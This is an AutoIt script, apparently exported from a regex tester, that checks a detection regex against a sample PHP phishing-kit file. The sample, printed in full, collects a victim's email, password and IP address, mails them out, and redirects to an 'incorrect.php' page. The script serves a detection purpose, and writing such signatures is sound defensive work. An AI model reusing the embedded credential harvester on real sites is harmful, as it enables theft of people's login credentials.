#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?is)^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*\$ip\s*=\s*getenv\(['"]REMOTE_ADDR["']\);(\s*\$\w+\s*\.=\s*).{0,90}?\$_POST\[["']up_email["']\]\."\\n";\s*\1['"]\s*Password.{0,50}?\1['"]confirm\s*password.{0,90}?\1['"]\-+created\s*by\s*burhan\-+\\n["'];\s*include\s*["']email\.php.{0,50}?mail\([^;]+;\s*header\s*\(['"]location:\s*\w+.php\?email=\$email(?:[^>]+>\s*)?$"
Local $sString = "<?" & @CRLF & _
" " & @CRLF & _
"" & @CRLF & _
" " & @CRLF & _
"" & @CRLF & _
" " & @CRLF & _
"$ip = getenv("REMOTE_ADDR");" & @CRLF & _
"$message .= "--------------New Login--------\n";" & @CRLF & _
"$message .= "Email-ID : ".$_POST['up_email']."\n";" & @CRLF & _
"$message .= " Password : ".$_POST['up__X_PASSWORD']."\n";" & @CRLF & _
"$message .= "confirm password : ".$_POST['Password']."\n";" & @CRLF & _
"$message .= "Client IP : ".$ip."\n";" & @CRLF & _
"$message .= "---------------Created BY Burhan-----------\n";" & @CRLF & _
"include 'email.php';" & @CRLF & _
"$subject = "--New Log $ip ";" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"mail($to,$subject,$message,$headers);" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"header ("Location: incorrect.php?email=$email".$_POST['up_email']);" & @CRLF & _
" " & @CRLF & _
"?>"
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")